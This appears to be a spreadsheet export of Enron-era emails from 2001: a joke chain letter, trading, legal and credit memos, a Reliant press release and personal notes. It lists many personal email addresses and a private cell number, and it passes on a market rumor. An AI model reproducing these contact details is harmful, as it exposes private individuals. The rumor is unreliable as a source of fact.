To:	catalex@txcr.net; Ctown75@aol.com; sdobos@hot.rr.com; Farrell400@cs.com; efloca@hot.rr.com; bigdaddy@tisd.net; valgottschalt@yahoo.com; Dkaybg@aol.com; bobby.hempfling@nokia.com; thonaker@vvm.com; MISSUSA78@aol.com; dmorris@lsu.edu; emyers2@austin.rr.com; CLCNEWTON@aol.com; pedraz8811@aol.com; jpirtle@vvm.com; vrhodes@templeinland.com; MelSammons@aol.com; SaraS91@aol.com; shawns@vvm.com; TSmith7372@aol.com; kj4ph@hotmail.com; weldonvc@hotmail.com; winston@tisd.net; White, Stacey W._x000D_
Subject:	Fwd: FW: Fw: Signs that you've grown up._x000D_
_x000D_
Quite a few of these hit really close to home..........love, k_x000D_
Return-Path: &lt;Heather@LamonsGasket.com&gt;_x000D_
Received: from  rly-yc02.mx.aol.com (rly-yc02.mail.aol.com [172.18.149.34]) by air-yc05.mail.aol.com (v82.22) with ESMTP id MAILINYC54-1205143907; Wed, 05 Dec 2001 14:39:07 -0500_x000D_
Received: from  transport.lamonsgasket.com ([65.68.83.8]) by rly-yc02.mx.aol.com (v82.22) with ESMTP id MAILRELAYINYC28-1205143831; Wed, 05 Dec 2001 14:38:31 -0500_x000D_
Received: by transport.lamonsgasket.com with Internet Mail Service (5.5.2653.19)	id &lt;Y2NQQHV1&gt;; Wed, 5 Dec 2001 13:39:04 -0600_x000D_
Message-ID: &lt;5A0A66DFBD66D51193EF00105A1F4FC90D88BC@transport.lamonsgasket.com&gt;_x000D_
From: Heather Rios &lt;Heather@LamonsGasket.com&gt;_x000D_
To: "'Alan Peters'" &lt;ajpeters@texas.net&gt;, "'Eric'" &lt;etyler@allcapcorp.com&gt;,        "'Chris'" &lt;chris.r@forgital.com&gt;,        "'summer m ruckman'"	 &lt;summer.m.ruckman@mail.sprint.com&gt;,        "'Shelly.Mendel@enron.com'"	 &lt;Shelly.Mendel@enron.com&gt;,        "'PENPAL93@AOL.COM'" &lt;PENPAL93@AOL.COM&gt;,        "'Kevin Haase'" &lt;kevin.t.haase1@jsc.nasa.gov&gt;,        "'Jeff &amp; Kristi Stegall'"	 &lt;jkjstegall@aol.com&gt;,        "'Jason Harrison'" &lt;jharrison@advindustries.com&gt;,        "'DAVELOANE@cs.com'" &lt;DAVELOANE@cs.com&gt;,        "'danchristinalinnell@sbcglobal.net'" &lt;danchristinalinnell@sbcglobal.net&gt;_x000D_
Subject: FW: Fw: Signs that you've grown up._x000D_
Date: Wed, 5 Dec 2001 13:38:55 -0600_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2653.19)_x000D_
Content-Type: text/plain;	charset="iso-8859-1"_x000D_
_x000D_
I thought this was very funny._x000D_
_x000D_
-----Original Message-----_x000D_
From: Laurisa Langley_x000D_
Sent: Wednesday, December 05, 2001 1:34 PM_x000D_
To: 'Mom'; 'Debby Adams'; Summer Hardage; Lori Baker; Perry Harrell;_x000D_
Heather Rios; Randy Dubcak; Ben Sonnier; Damon Sonnier; 'Rick Garton';_x000D_
'Natalyn Royer'; 'Brian/Mollie Gold'_x000D_
Subject: FW: Fw: Signs that you've grown up._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: bcabrero [mailto:bcabrero@heart.thi.tmc.edu]_x000D_
Sent: Wednesday, December 05, 2001 1:30 PM_x000D_
To: laurisal@lamonsgasket.com_x000D_
Subject: FW: Fw: Signs that you've grown up._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Guy.F.Sears@bankofamerica.com_x000D_
[mailto:Guy.F.Sears@bankofamerica.com]_x000D_
Sent: Tuesday, December 04, 2001 11:14 AM_x000D_
To: Kana Tracy Ward; rtumlin99@aol.com; efrog@justicemail.com;_x000D_
SSears6804@aol.com; dgsnods@hotmail.com;_x000D_
Nancy.A.Schallert@bankofamerica.com; Susan.J.Saiz@bankofamerica.com;_x000D_
dowens@mail.bokf.com; Kidez@aol.com; BMenapace@salud.unm.edu;_x000D_
Keri.L.Honeycutt@bankofamerica.com; Tracyface2@aol.com;_x000D_
bdimuro@pacifier.com; CoveBear@aol.com; Tracy.S.Bates@bankofamerica.com;_x000D_
ibjckid@aol.com; The Sears Family; JStra11294@aol.com;_x000D_
debjohn19@yahoo.com; Melbad1@aol.com; jschouman@earthlink.net;_x000D_
montserrat_nm@yahoo.com; lspost0104@aol.com; rortiz8580@aol.com;_x000D_
Menapace_Frank@tmac.com; houstomj@WellsFargo.COM;_x000D_
Barbara.grubb@bams.com; Barbara.Fewkes@bams.com; WeRTheDust@aol.com;_x000D_
BzAngelnNM@aol.com; panglada@clandsw.com_x000D_
Subject: Fwd: Fw: Signs that you've grown up._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
this covers just about everyone I know._x000D_
_x000D_
_x000D_
Unfortunately, the last one did apply to me.  Happy Holidays.  :-)_x000D_
_x000D_
  . 1. Your potted plants are alive. And you can't smoke a one of them._x000D_
    2. Having sex in a twin-sized bed is absurd._x000D_
    3. You keep more food than beer in the fridge._x000D_
    4. 6:00 AM is when you get up, not when you go to sleep._x000D_
    5. You hear your favorite song on an elevator._x000D_
    6. You carry an umbrella. You watch the Weather Channel._x000D_
    7. Your friends marry and divorce instead of hookup and breakup._x000D_
    8. You go from 130 days of vacation time to 7._x000D_
    9. Jeans and a sweater no longer qualify as 'dressed up.'_x000D_
    10. You're the one calling the police because those darn kids next_x000D_
        door don't know how to turn down the stereo._x000D_
    11. Older relatives feel comfortable telling sex jokes around you._x000D_
    12. You don't know what time Taco Bell closes anymore._x000D_
    13. Your car insurance goes down and your car payments go up._x000D_
    14. You feed your dog Science Diet instead of McDonald's._x000D_
    15. Sleeping on the couch makes your back hurt._x000D_
    16. You no longer take naps from noon to 6 p.m._x000D_
    17. Dinner and a movie - The whole date instead of the beginning of one._x000D_
    18. Eating a basket of chicken wings at 3 a.m. would severely upset,_x000D_
        rather than settle, your stomach._x000D_
    19. You go to the drugstore for Ibuprofen and antacids, not condoms_x000D_
        and pregnancy test kits._x000D_
    20. A $4.00 bottle of wine is no longer 'pretty good stuff.'_x000D_
    21. You actually eat breakfast foods at breakfast time._x000D_
    22. "I just can't drink the way I used to," replaces "I'm never going to_x000D_
drink that much again."_x000D_
    23. Over 90% of the time you spend in front of a computer is for real_x000D_
work._x000D_
    24. You don't drink at home to save money before going to a bar._x000D_
    25. You read this entire list looking for one sign that doesn't apply to_x000D_
you._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 05:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: FW: Bird and Baseball [CGEY Virus checked]</t>
  </si>
  <si>
    <t>I am going with Wachsler  tomorrow, so maybe we can hook up and have a beer.  _x000D_
Darron has my cell number 713-819-0765._x000D_
PL</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 15:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'fernley.dyson@enron.com', 'ted.murphy@enron.com', 'michael.brown@enron.com'})</t>
  </si>
  <si>
    <t>General Alarm---Enron Metals Recycling</t>
  </si>
  <si>
    <t>A "Doorstep" inspection of this business was performed in accordance with our procedures and apparently this business is a disaster!!! We need immediate action on this up to and including shutting it down. This was the worst we have seen at Enron and I don't even want to put in this email what I heard was going on there. _x000D_
_x000D_
We need a coordinated solution here asap to avoid a real disaster, if there isn't one already. I'll speak with Rick Causey here about what immediate action we should take but the more you guys can dig into this the better. More to come._x000D_
_x000D_
Rick</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 09:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">i would love to play the saints.  as i recall we ran right through that great _x000D_
defense.  </t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 07:25:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>getting launched this friday_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shankman, Jeffrey A.  _x000D_
Sent:	Tuesday, October 23, 2001 9:23 AM_x000D_
To:	Nowlan Jr., John L._x000D_
Subject:	_x000D_
_x000D_
what about a 24/7 brent product?</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 00:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'melf116@aol.com'})</t>
  </si>
  <si>
    <t>Hey John &amp; Angie, Have you heard the news from K-Girl?  Probably, but I'm_x000D_
going to tell you anyway.  We're going to have a wedding July 28th.  K-Girl &amp;_x000D_
B-Boy will get married in Midland at Centennial Plaza(the most beautiful_x000D_
water garden) in the AM.  We're pretty excited about the whole thing._x000D_
Keran's words to you are, you would make it very special if you_x000D_
Angie(especially you Angie) &amp; John(of course you John) could be there. It's_x000D_
going to be a beautiful affair, no problems(everyoune must leave problems at_x000D_
home or not come) that's the rules.  Southwest is running a special and I_x000D_
would fly you two out for the day or for however long you wanted to stay._x000D_
Check your calendar and if you can it will be WONDERFUL but remember if you_x000D_
can't we certainly understand and will just have to have another one in_x000D_
Houston just for you two._x000D_
Love you so much!!!!_x000D_
Mel</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 14:02:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'steve.van@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'tana.jones@enron.com', 'julia.murray@enron.com', 'elizabeth.sager@enron.com'})</t>
  </si>
  <si>
    <t>RE: Adoption Agreement applicable to ISDA Masters</t>
  </si>
  <si>
    <t>For the Financial Masters I will draft and email shortly another paragraph that will need to be added to the Adoption Agreement to cover the situation where the counterparty has provided a parent guaranty under the ENA Master Agreement.  The paragraph will provide for the adoption of the terms of that guaranty for purposes of the ERMT Master and necessitate the signature of the guarantor on the Adoption Agreement._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Van Hooser, Steve  _x000D_
Sent:	Friday, November  2, 2001 9:20 AM_x000D_
To:	Koehler, Anne C.; Jones, Tana; McCullough, Travis; Murray, Julia; Sager, Elizabeth; Taylor, Mark E (Legal)_x000D_
Cc:	Korkmas, Deb; Nettelton, Marcus_x000D_
Subject:	Adoption Agreement applicable to ISDA Masters_x000D_
Importance:	High_x000D_
_x000D_
I have reviewed the attached draft with Anne, Travis and Marcus.  For purposes of maintaining consistency between the 3 disciplines, I would appreciate your using the attached for any further ISDA Adoption Agreements you may have.  Anne's suggested Item 7 to Scheule B should cut down your due diligence workload appreciably regaring the various places that Affiliate is used in the Master. _x000D_
_x000D_
The main change from the draft Anne sent out yesterday evening is that it "reinserts" the Schedule C with Credit information._x000D_
_x000D_
Please call with any question._x000D_
_x000D_
Steve_x000D_
 &lt;&lt; File: MARKEDAdoption AgreementISDA(SVH 11-02-01).doc &gt;&gt;  &lt;&lt; File: Adoption AgreementISDA(SVH 11-02-01).doc &gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
Steve Van Hooser_x000D_
Enron North America Corp._x000D_
713-853-7238_x000D_
713-646-3490 (fax)</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 01:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Word on the Street -- Reliant Was Setup</t>
  </si>
  <si>
    <t xml:space="preserve">The feeling on the street is that Reliant was setup with the $1900 sale.  The _x000D_
word is that the bid for $1900 power had been sitting there for months and _x000D_
that Reliant had an "understanding" with DWR and the ISO that the bid was not _x000D_
supposed to be taken except in dire need -- it's for a peaker and the price _x000D_
represents the opportunity cost of running it now, and using up its very _x000D_
limited emission credits, rather than running it during the real peak times _x000D_
this summer. The $1900 represents the estimated cost to Reliant of Reliant _x000D_
having to buy power this summer on the market when it otherwise would have _x000D_
had its peaker available.  The wors is that the state/ISO took the bid, when _x000D_
there was not dire need, just to make Reliant look evil and point to ever _x000D_
higher prices -- when? -- yes, the week before the Bush plan was to come out._x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
_x000D_
_x000D_
_x000D_
	"Ronald Carroll" &lt;rcarroll@bracepatt.com&gt;_x000D_
	05/18/2001 07:16 AM_x000D_
		 _x000D_
		 To: &lt;gfergus@brobeck.com&gt;, &lt;mmilner@coral-energy.com&gt;, _x000D_
&lt;rreilley@coral-energy.com&gt;, &lt;acomnes@enron.com&gt;, &lt;dfulton@enron.com&gt;, _x000D_
&lt;jsteffe@enron.com&gt;, &lt;rshapiro@enron.com&gt;, &lt;smara@enron.com&gt;, _x000D_
&lt;snovose@enron.com&gt;, &lt;jalexander@gibbs-bruns.com&gt;, &lt;sbishop@gibbs-bruns.com&gt;, _x000D_
&lt;gackerman@wptf.org&gt;_x000D_
		 cc: _x000D_
		 Subject: Fwd: Reliant's Reaction To Being Singled Out By Governor Davis_x000D_
_x000D_
_x000D_
----- Message from "Tracey Bradley" &lt;tbradley@bracepatt.com&gt; on Fri, 18 May _x000D_
2001 08:12:38 -0500 -----_x000D_
To:	"Justin Long" &lt;jlong@bracepatt.com&gt;, "Paul Fox" &lt;pfox@bracepatt.com&gt;_x000D_
cc:	"Ronald Carroll" &lt;rcarroll@bracepatt.com&gt;_x000D_
Subject:	Reliant's Reaction To Being Singled Out By Governor Davis_x000D_
May 17, 7:52 pm Eastern Time_x000D_
_x000D_
Press Release_x000D_
_x000D_
Reliant Energy Urges Governor Davis to Trade Political Fingerpointing for _x000D_
Solutions_x000D_
_x000D_
HOUSTON--(BUSINESS WIRE)--May 17, 2001--Reliant Energy strongly disagrees _x000D_
with California Governor Gray Davis' recent characterization of the company _x000D_
as being ``obstructionist'' and opposing court orders. _x000D_
_x000D_
Reliant Energy believes that these accusations are politically motivated _x000D_
attempts to demonize Reliant Energy as an outsider responsible for causing _x000D_
the state's energy crisis. The accusations are simply not based on fact. More _x000D_
importantly, the governor's attacks have done nothing to increase the state's _x000D_
supply of electricity or prevent the blackouts expected this summer. If _x000D_
anything, the comments have fostered an atmosphere of distrust and _x000D_
uncertainty that have further destabilized the market. _x000D_
_x000D_
``Reliant hopes the governor and others will stop these baseless accusations _x000D_
and focus on true solutions to California's energy shortage,'' said Joe Bob _x000D_
Perkins, president and chief operating officer, Reliant Energy Wholesale _x000D_
Group. ``We are now being singled out because we believe in an open market, _x000D_
not government control of power generation, and we have offered solutions _x000D_
that do not jibe with the governor's political agenda. Contrary to the _x000D_
perception Governor Davis is attempting to promote, we have been focused on _x000D_
providing solutions that are fair to all parties in California since the _x000D_
outset of this crisis. In fact, earlier this week we provided the governor's _x000D_
office with an outline of a series of emergency measures that, if pursued _x000D_
quickly, could help mitigate the power crisis this summer. We are still _x000D_
waiting on a response.'' _x000D_
_x000D_
Perkins pointed out many of the steps Reliant Energy has taken to keep the _x000D_
lights on in California, disputing the accusation of being _x000D_
``obstructionist'': _x000D_
_x000D_
Reliant Energy has run its 30-to-50-year-old plants at the highest levels _x000D_
since their purchase in 1998. In 2000, Reliant nearly doubled the output from _x000D_
these plants to meet the needs of Californians -- running them at levels far _x000D_
exceeding the prior owner, Southern California Edison._x000D_
_x000D_
Reliant Energy invested $80 million dollars in 2000 alone to upgrade plants _x000D_
to make sure the most power possible is available during peak times. In _x000D_
addition, the company improved emissions levels to clean up the environment _x000D_
and keep costs for emission credits to a minimum._x000D_
_x000D_
For the last two years, Reliant has encouraged the Investor Owned Utilities _x000D_
and the state to invest in long-term contracts to stabilize rates instead of _x000D_
relying on the spot market. In particular, Reliant Energy offered to sell _x000D_
power at two cents per kilowatt-hour if the buyer would purchase the natural _x000D_
gas required to generate the power, ensuring a transparent cost of power._x000D_
_x000D_
Reliant Energy has never shut down generation despite the prevalent concerns _x000D_
that continue to exist over credit issues. In contrast, just last week a _x000D_
major out-of-state supplier refused to continue to sell to California unless _x000D_
payment was forthcoming._x000D_
_x000D_
Reliant Energy has created an aggressive curtailment plan to encourage _x000D_
businesses to ``sell back'' power voluntarily to add more power to the _x000D_
Western power grid. The company has met with many leaders in Western states _x000D_
to introduce the program, yet California officials will not even engage in a _x000D_
dialogue on the program. _x000D_
_x000D_
``We welcome the opportunity to discuss these issues one-on-one with the _x000D_
governor,'' Perkins said. ``Unfortunately, he has repeatedly refused this _x000D_
request over the past year. Last week's meeting with generators was the first _x000D_
time the group was allowed to speak with him directly, and obviously the _x000D_
purpose of that meeting was political grandstanding.'' _x000D_
_x000D_
Perkins added that the governor's accusations of opposing court orders are _x000D_
unfounded. ``We have always worked within the law and are proud of our _x000D_
commitment to keeping the lights on. We have followed all court orders and _x000D_
worked closely with the FERC and others to cooperate fully with all _x000D_
investigations. When necessary, we have filed court challenges to orders that _x000D_
we believe violate our rights -- hardly an illegal action.'' _x000D_
_x000D_
To participate in a telephone press conference tomorrow, Friday May 18 at 11 _x000D_
a.m. PDT, contact Maxine Enciso at 310/444-1303 or Richard Wheatley at _x000D_
713/207-5881. _x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
Contact: _x000D_
_x000D_
     For Reliant Energy_x000D_
     Los Angeles: Maxine Enciso, 310/444-1303_x000D_
     Media: Richard Wheatley, 713/207-5881_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 00:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Notice of Meeting of Directors of TBS on March 28, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Eddy: Let's get together and go over the agenda before the meeting.  Thanks.  _x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
	Eddy Daniels@ENRON_x000D_
	03/20/2001 05:18 PM_x000D_
		_x000D_
		 To: Johannes.Walzebuck@shell.com.br, James Derrick/Enron@EnronXGate, Mark E _x000D_
Haedicke/HOU/ECT@ECT, Rebecca McDonald/Enron@EnronXGate, James A _x000D_
Hughes/Enron@EnronXGate_x000D_
		 cc: Federico Cerisoli/SA/Enron@Enron, Nancy Muchmore/NA/Enron@Enron, Denise _x000D_
Almoina/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, pnazro@velaw.com_x000D_
		 Subject: Notice of Meeting of Directors of TBS on March 28, 2001_x000D_
_x000D_
Please find attached a notice of a board of directors meeting for Transborder _x000D_
Gas Services Ltd. for next Weds., March 28, 2001.  The meeting will be held _x000D_
immediately after presentations to the shareholders' representatives (Enron &amp; _x000D_
Shell ) in Cuiaba, Brazil and will start at 11:00 am local time (9am Houston _x000D_
time).  There will be a telephone call-in number for board members who can _x000D_
not attend in person which will circulate later this week._x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Eddy Daniels_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 00:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>nat gas strips as hot links 5/16</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  , 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
Nat Gas Summer Strip_x000D_
http://www.carrfut.com/research/Energy1/summerstrip22.pdf_x000D_
Nat Gas Winter Strip_x000D_
http://www.carrfut.com/research/Energy1/winterstrip22.pdf_x000D_
Nat Gas Calendar Strip_x000D_
http://www.carrfut.com/research/Energy1/calendarstrip22.pdf_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 08:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: VaR</t>
  </si>
  <si>
    <t>Vince_x000D_
_x000D_
Thanks for the update - especially your point 3 which echoes our own _x000D_
discussion yesterday: I want to clarify responsibilities for maintenance and _x000D_
administration of VAR. _x000D_
We need transparency around the process so that mapping decisions, for _x000D_
example, are easily made, supported and reviewed. _x000D_
_x000D_
It became clear after last Friday's events, that we are in an awkward _x000D_
paradigm with respect to how we handle VAR here, particularly at "pressure _x000D_
points"._x000D_
_x000D_
I am putting together the scope of a "general overhaul" of the VAR process, _x000D_
including method and administration, to which I hope we would all buy in, so _x000D_
be assured of our co-operation._x000D_
_x000D_
DP _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Kaminski, Vince  _x000D_
Sent: Wednesday, April 11, 2001 2:49 PM_x000D_
To: Port, David_x000D_
Cc: Lavorato, John; Kaminski, Vince; Tamarchenko, Tanya_x000D_
Subject: VaR_x000D_
_x000D_
David,_x000D_
_x000D_
During today's VaR coordination meeting  we had a discussion of issues _x000D_
related to mapping of the forward price curves into core locations._x000D_
_x000D_
Mapping is a  necessity dictated by the limitations of the computer system:_x000D_
we have to reduce the dimensionality of the problem to stay within the bounds_x000D_
of available CPU memory. Also, in some cases the quality of price discovery _x000D_
is poor _x000D_
and it's difficult to model the price curves independently: we solve the _x000D_
problem by mapping_x000D_
them into more liquid and better behaved core  locations curves._x000D_
_x000D_
We have agreed on the following:_x000D_
_x000D_
1. Winston will investigate the IT side and determine to what extent we can _x000D_
increase the number_x000D_
of forward price curves that are simulated as basic (core) curves. He will _x000D_
investigate the impact of a larger_x000D_
number of the core curves on the time required to complete the VaR run._x000D_
_x000D_
2. The curves associated with the biggest 10-20 positions in each commodity _x000D_
should be_x000D_
modeled as core curves (i.e. no mapping into other locations). It makes sense _x000D_
to monitor_x000D_
the biggest risks separately and avoid aggregating them into  less _x000D_
transparent aggregates._x000D_
_x000D_
3. The results of an automated clustering (mapping) procedures should be _x000D_
systematically_x000D_
monitored by a human and corrected if they misrepresent the risks of the _x000D_
trading positions._x000D_
This responsibility should be vested with one person (right now the _x000D_
responsibility is_x000D_
dispersed through the organization and this means in practice that nobody_x000D_
is responsible). Research can allocate one person to this task;_x000D_
cooperation of trading and RAC will be critical._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 15:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'camsell@pacbell.net', 'cameron@perfect.com', 'psellers@haas.berkeley.edu', 'psellers@pacbell.net', 'scottwl@hotmail.com', 'nancy.sellers@mondavi.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>My Christmas present</t>
  </si>
  <si>
    <t>Finally got the DirecTV dish working and it's terrific!  It's twenty times_x000D_
faster than what my modem gave me before launching the new equipment.  I_x000D_
downloaded a Mozart symphony (played by a quartet, believe it or not) from_x000D_
Napster which was almost ten megabytes in size in about two and a half_x000D_
minutes.  Ordinarily that would have taken about forty-five minutes to_x000D_
download.  I only had to cut down one limb of a tree to get the dish aimed_x000D_
properly.  I really appreciate the Christmas gift.  I haven't switched my_x000D_
email service over yet so that will take a couple more days.  When I do,_x000D_
I'll let you know the new address.  Thanks again.</t>
  </si>
  <si>
    <t>Re: storage clarification &amp; issues</t>
  </si>
  <si>
    <t xml:space="preserve">I'm there.  I'm out Friday.  Also, Molly will be full time CES starting next _x000D_
week._x000D_
_x000D_
Kim, please reserve a room for a conference call for one hour starting at _x000D_
11:00 am this Thursday._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Colleen Sullivan                           03/28/2000 12:49 PM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: storage clarification &amp; issues_x000D_
_x000D_
Chris--FYI--are you available for a meeting Thursday, March 30 at 11:00 a.m. _x000D_
to discuss these issues?  If so, will you ask Kim to get a room for us for _x000D_
about an hour?  _x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Colleen Sullivan/HOU/ECT on 03/28/2000 _x000D_
12:47 PM ---------------------------_x000D_
_x000D_
_x000D_
mflewellyn@columbiaenergygroup.com on 03/28/2000 12:34:07 PM_x000D_
To: " - *colleen.sullivan@enron.com" &lt;colleen.sullivan@enron.com&gt;_x000D_
cc:  _x000D_
Subject: storage clarification &amp; issues_x000D_
_x000D_
_x000D_
Colleen,_x000D_
_x000D_
Attached is an updated storage proxy schedule for COH and AGL showing what our_x000D_
balance will be as of April 1, 2000.  As always, if you have any questions,_x000D_
please let me know.  I'm sending a copy of the document to Denny Pick for_x000D_
signature and will then send it to Jeff Hodge to get signature from Enron._x000D_
_x000D_
Aside from the storage issue, there are several other items that we need to_x000D_
discuss.  Below is a brief description of each.  Please let me know how you_x000D_
think we could best deal with these - whether it's via phone call or having an_x000D_
in-person meeting down in your office._x000D_
_x000D_
1.  Pricing - I left you a message about this last week.  According to Chris_x000D_
Germany, all changes to volumes after first-of-the-month must me negotiated._x000D_
In the contract, however, it specifically refers to pricing intra-month using_x000D_
gas daily OR negotiated pricing depending on the timing of the change._x000D_
_x000D_
2.  Consistency - During our discussions with Chris, it sounds as though some_x000D_
pipes are being handled differently than others again as it relates to_x000D_
intra-month changes.  I'd just like to make sure that we agree on the pricing_x000D_
mechanism and then apply it consistently._x000D_
_x000D_
3.  Local production - Apparently there was local production that John Singer_x000D_
purchased specifically to back Retail customers, and this production was not_x000D_
removed from the Wholesale book prior to the sale.  We need to discuss how to_x000D_
handle this production._x000D_
_x000D_
4.  Monthly invoices - We still haven't seen the complete January 2000_x000D_
invoice.  As I understand it, the demand charges have not all been sent over,_x000D_
and several items that need to be changed haven't yet been changed.  Also,_x000D_
Brian Perrone and Charlie Dalphon have indicated that they have requested_x000D_
back-up documentation on the demand charges, but we still haven't received_x000D_
anything._x000D_
_x000D_
5.  Swap confirmations - For all of the swaps that Clay Deaton put in place_x000D_
with Enron to keep Retail's existing hedge positions in tact, I still do not_x000D_
have executed copies of all of the confirmation agreements.  Rich Contos and I_x000D_
have both called several people about getting a complete set of copies, but we_x000D_
can't seem to find the right person over there._x000D_
_x000D_
Whenever you have time to discuss these, please let me know._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Melissa_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 14:43:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gloria.ogenyi@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'teresa.seibel@enron.com', 'david.gorte@enron.com', 's..bradford@enron.com', 'james.wood@enron.com', 'l..nicolay@enron.com', 'ron.bertasi@enron.com', 'edward.hamb@enron.com', 'harry.kingerski@enron.com', 'patricia.collins@enron.com', 'amr.ibrahim@enron.com', 'jean.ryall@enron.com', 'janet.dietrich@enron.com', 'michael.tribolet@enron.com', 'evan.hughes@enron.com', 'rebecca.fite@enron.com', 'scott.gahn@enron.com', 'travis.andrews@enron.com', 'william.frederking@enron.com', 'd..steffes@enron.com'})</t>
  </si>
  <si>
    <t>TEXAS: Credit  Issues for Retail Operaations</t>
  </si>
  <si>
    <t>Background: Because of the situation that has arisen with ConEd (NY) rejecting our parental guaranty and asking EES to put up a 1 million dollar LC, bond, or cash for our retail operations behind ConEd; and in the light of the ongoing financial issues and credit downgrades facing Enron, it has become necessary to evaluate our positions_x000D_
and available options in various markets relative to creditworthiness issues, and the continued ability of EES to serve customers behind specific utilities._x000D_
For Texas this evaluation is important given the outstanding success of the TX team in enrolling customers and the contracts and volumes currently outstanding._x000D_
This analysis will focus on the present credit rating of Enron, and consider any possible further down grades._x000D_
_x000D_
_x000D_
Enron's Current Credit Rating of BBB and Baa2_x000D_
1.  To remain a credit worthy counter party within the provisions of the Tariff for Retail Service, EES must have and maintain a long term unsecured credit rating of not less than BBB- or Baa3. _x000D_
_x000D_
2.  Pursuant to Art 4.4.5 of the Tariff for Retail Service, EES has an obligation to pay to the TDSP (Wires Company) all invoiced delivery charges 35 calendar days after invoicing, (plus a 10 day grace period - total 45 calendar days) regardless of whether or when it receives payment from the customer. _x000D_
_x000D_
3. Under Art. 4.5.1 of the Tariff for Retail Service, a TDSP shall not require deposits from EES as long as we remain current on our obligations for the T &amp; D portion of the bill._x000D_
( a deposit can only be required if a REP has defaulted within the past 24 months)._x000D_
_x000D_
4. In the event that EES defaults, we will be required to provide a deposit. Required deposit is 1/6th (one-sixth) of the estimated annual billable amount for the wires charges._x000D_
Alternatively, we could at our option, choose to provide a cash, surety bond, LC, parent guaranty or any combination of these. Additionally, EES can negotiate with the relevant TDSP to reach a mutually suitable agreement._x000D_
_x000D_
5. EES is not rated and technically can be required by any TDSP in TX,  to provide security today. If such a request is made, a parental guaranty from Enron corp will suffice, given our current rating of BBB and Baa2 by Moody's and S&amp; P. However, if Enron Corp is downgraded below the required tariff level, the following will be applicable:_x000D_
_x000D_
Enron's Credit Rating goes below BBB- or Baa3_x000D_
1. EES will be required to provide a deposit for wires charges._x000D_
_x000D_
2. Deposit will be 1/6th of the estimated annual wires charges of the relevant utility, and will be in the nature of bonds, LC, or cash._x000D_
_x000D_
3. Failure to provide or maintain acceptable creditworthiness could result in the following:_x000D_
	- Request to the Commission for suspension or revocation of EES's license to market in TX_x000D_
	- Transfer of the billing and collection responsibility for all EES charges to the POLR, with customer payments allocated first to wires and non-bypassable chares, 	and remainder to EES_x000D_
	- Transfer of customer payments to a lock box controlled by the TDSP, with payments allocated first to wires and non-bypassable charges_x000D_
	-Transfer of EES's customer to another REP or to the POLR._x000D_
4. Legal remedies._x000D_
_x000D_
